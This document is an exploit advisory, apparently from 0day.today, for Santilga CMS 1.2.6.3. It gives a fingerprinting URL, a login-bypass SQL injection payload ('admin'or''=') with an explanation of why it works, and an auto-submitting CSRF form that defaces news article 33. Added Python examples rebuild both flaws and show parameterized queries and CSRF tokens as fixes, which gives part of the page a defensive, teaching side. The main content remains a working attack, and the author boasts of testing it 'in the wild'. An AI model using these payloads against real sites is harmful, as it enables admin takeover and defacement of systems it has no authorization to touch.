=============================
Vulnerable software: Santilga CMS version 1.2.6.3
Vendor: santilga.com
$ head -n 10 Admin.php|less
<?php
/**
* DO NOT EDIT THIS FILE! IT WILL BE OVERWRITTEN BY THE GENERATOR!
*
* @version 1.2.6.3 - generated: 2010-11-06 14:39:32
*/
class Admin_Bean_Base extends Santilga_Bean {
protected $_primaryKey = 'id';
============================
Time to 0day it.
============================
Tested:
In the wild :P
OS: Windows Server (Web Server edition) with XAMPP, and Linux.
=============================
Vuln Desc
Condition: magic_quotes_gpc = Off (with it on, the injected quote gets escaped).
This CMS is commercial and is vulnerable to SQL injection and CSRF.
The login username is passed into the MySQL query without any sanitization, so we can manipulate the query.
Also, if you want to fingerprint a target and make sure the site really runs Santilga, request:
site.tld/admin/dashboard
Doing that takes you straight to the administration section.
===================SNIP===========================
$ cat AdminLogin.php|less
<?php
class AdminLogin_Controller extends Santilga_Controller{
public function __construct() {
$this->view->templateName = "admin";
parent::__construct();
$this->lang = Santilga_Language::getInstance()->getLanguage();
$this->view->lang = $this->lang;
$this->view->showUploadForm = false;
}
public function indexAction(){
if($this->helpers->User->adminLoggedIn()){
$this->helpers->Url->redirect("admin/about");
}else{
$this->helpers->Url->redirect("adminLogin/login");
}
}
public function logoutAction(){
$session = Santilga_Resource::get("session");
if($session->adminLoggedIn){
unset($session->admin);
unset($session->adminId);
unset($session->adminLoggedIn);
}
$this->helpers->Url->redirect("adminLogin/login");
}
public function loginAction(){
$this->view->layoutFile = "loginLayout.php";
$request = $this->request->getParams();
$session = Santilga_Resource::get("session");
$model = Admin_Model::getInstance();
$error = array();
if($post = $this->request->getPost()){
/*$data = array('username' => $this->request->getPost('username'),
'password' => $this->request->getPost('password')
);*/
if(!empty($post["username"]) && !empty($post["password"])){
$admin = $model->autenticate($post); // the raw POST array goes straight to the model, which builds the query shown below from it
if($admin !== null){
$session->admin = $admin;
$session->adminId = $admin->id;
$session->adminLoggedIn = true;
$this->helpers->Url->redirect("admin/about");
}else{
$error[] = Santilga_Language::_("userPassMismatch", "Error:: username and/or password didn't match or you are not admin");
}
}else{
$error[] = Santilga_Language::_("userPassRequired", "Username and password must not be empty");
}
}
$this->view->error = $error;
$this->view->title = Santilga_Language::_("panelLogin", " Panel Login");
$this->view->mainContent = $this->view->content("form", "login");
$this->view->rightBlock = false;
}
}
?>
================================================================
If we simply pass a single quote (') as the login, we get the error below. Note that the password is hashed before it reaches the query (the 32-character hex digest in the leaked statement), so the username is the injectable field; the unescaped quote in username= ''' breaks the statement:
27.05.12 11:22:39- Uncaught Santilga_Database_Exception, code: 1064,Message:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '3590cb8af0bbb9e78c343b52b93773c9''
at line 1,SQL:SELECT `admin`.* FROM admin WHERE username= ''' AND password= '3590cb8af0bbb9e78c343b52b93773c9'
#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] =>
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '3590cb8af0bbb9e78c343b52b93773c9''
at line 1,SQL:SELECT `admin`.* FROM admin WHERE username= ''' AND password= '3590cb8af0bbb9e78c343b52b93773c9' ,[] => ,[] => 1064,[]
Exploiting:
site.tld/admin/
Login: admin'or''='
Password: whateveryouwant
The query then reads WHERE username= 'admin'or''='' AND password= '<hash>'. AND binds tighter than OR, so it evaluates as username='admin' OR (''='' AND password='<hash>') and the admin row comes back whatever the password is.
Logged in:)
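To make the precedence trick reproducible offline, here is an added example (not Santilga code) that rebuilds the leaked login statement against an in-memory SQLite table and runs it once with the raw concatenation the error message reveals and once with bound parameters. The admin table layout, the sample password and the use of MD5 for the 32-character digest are assumptions; the query text is the one from the exception above.

```python
"""Added example: models the leaked Santilga login query against SQLite.
Not project code; table layout and MD5 hashing are assumptions."""
import hashlib
import sqlite3


def pw_hash(password):
    # The leaked query carries a 32-hex-char digest for the password;
    # MD5 is assumed here, the CMS's real hash function is not on the page.
    return hashlib.md5(password.encode()).hexdigest()


def make_db():
    # Constructed sample table; only the columns seen in the leaked SQL matter.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO admin (username, password) VALUES (?, ?)",
               ("admin", pw_hash("correct-horse")))
    db.commit()
    return db


def vulnerable_login(db, username, password):
    # Same concatenation as the leaked statement: the username goes in raw,
    # the password is hashed first, so only the username is injectable.
    sql = ("SELECT `admin`.* FROM admin WHERE username= '%s' AND password= '%s'"
           % (username, pw_hash(password)))
    return db.execute(sql).fetchone()


def safe_login(db, username, password):
    # Hardened form: bound parameters, so the quote in the payload is just data.
    sql = "SELECT `admin`.* FROM admin WHERE username = ? AND password = ?"
    return db.execute(sql, (username, pw_hash(password))).fetchone()


def quote_breaks_query(db):
    # The page's probe: a lone quote as the login yields a syntax error
    # (code 1064 on MySQL, OperationalError here), which confirms the injection.
    try:
        vulnerable_login(db, "'", "x")
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("probe raises a DB error:", quote_breaks_query(db))
    # username= 'admin'or''='' AND password= '<hash>'
    #   -> username='admin' OR (''='' AND password='<hash>')  -> admin row
    print("vulnerable:", vulnerable_login(db, "admin'or''='", "whateveryouwant"))
    print("parameterized:", safe_login(db, "admin'or''='", "whateveryouwant"))
```

SQLite accepts the MySQL backtick quoting and shares the AND-over-OR precedence, so the payload behaves exactly as in the advisory; the parameterized variant returns nothing because the payload is compared as a literal username.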
CSRF:
The news edit action takes a plain POST with no anti-CSRF token, so a page like the following, opened in a browser that holds a live admin session, rewrites article id 33:
==================================================================
<body onload="javascript:document.forms[0].submit()">
<form enctype="multipart/form-data" action="http://TARGET_SITE/admin/news/edit/id-33" method="post">
<input type="hidden" name="id" value="33" />
<input type="hidden" name="title" id="title" value="<h1>PwnEd</h1>" />
<textarea type="hidden" id="introtext" name="introtext" cols="0" rows="0" >
<h1>You Have Been PwnEd</h1>
</textarea>
<input type="hidden" id="ordering" name="ordering" value="1" size="3" maxlength="5" />
<select type="hidden" name="published">
<option value="1" selected="selected">Yes</option>
<option value="0" >No</option>
</select>
</form>
===================================================================
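As an added example (not Santilga code), the following models the news edit action the PoC above targets, first as the CMS behaves (any POST from a logged-in admin is applied) and then with a per-session token and an Origin check that would stop the auto-submitting form. The field names come from the PoC form; the session keys mirror the ones logoutAction() unsets; the article content, the handler shape and the TARGET_SITE origin are assumptions.

```python
"""Added example: vulnerable vs. hardened model of admin/news/edit/id-N.
Not project code; field names come from the PoC form, the rest is assumed."""
import hmac
import secrets

SITE_ORIGIN = "http://TARGET_SITE"  # placeholder from the PoC, not a real host


def new_admin_session(admin_id):
    # Session keys as logoutAction() unsets them, plus a CSRF token the CMS lacks.
    return {"adminId": admin_id, "adminLoggedIn": True,
            "csrf_token": secrets.token_hex(32)}


def sample_articles():
    # Constructed content for article id 33, the id the PoC form rewrites.
    return {33: {"title": "Release notes", "introtext": "Original text",
                 "ordering": 1, "published": True}}


def poc_form():
    # The hidden fields of the PoC form as the victim's browser would POST them.
    return {"id": "33", "title": "<h1>PwnEd</h1>",
            "introtext": "<h1>You Have Been PwnEd</h1>",
            "ordering": "1", "published": "1"}


def apply_edit(form, articles):
    art = articles[int(form["id"])]
    art.update(title=form["title"], introtext=form["introtext"],
               ordering=int(form["ordering"]), published=form["published"] == "1")
    return "ok"


def vulnerable_news_edit(session, form, articles):
    # What the PoC relies on: the session cookie alone authorizes the write.
    if not session.get("adminLoggedIn"):
        return "redirect: adminLogin/login"
    return apply_edit(form, articles)


def hardened_news_edit(session, form, articles, origin=None):
    if not session.get("adminLoggedIn"):
        return "redirect: adminLogin/login"
    # Defence 1: a token bound to the session must be echoed back in the form;
    # the attacker's page cannot read it, and compare_digest avoids timing leaks.
    if not hmac.compare_digest(form.get("csrf_token", ""), session["csrf_token"]):
        return "rejected: missing or wrong csrf token"
    # Defence 2: when the browser sends an Origin header it must be our own site;
    # the auto-submitting PoC page is served from the attacker's origin.
    if origin is not None and origin != SITE_ORIGIN:
        return "rejected: cross-origin request"
    return apply_edit(form, articles)


if __name__ == "__main__":
    session = new_admin_session(1)
    articles = sample_articles()
    print("vulnerable:", vulnerable_news_edit(session, poc_form(), articles),
          articles[33]["title"])
    articles = sample_articles()
    print("hardened:", hardened_news_edit(session, poc_form(), articles),
          articles[33]["title"])
```

Marking the session cookie SameSite=Lax would also defeat this particular PoC, since the browser then withholds the cookie on a cross-site POST; the token check is still needed for clients that ignore the attribute.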
# 0day.today [2018-01-03] #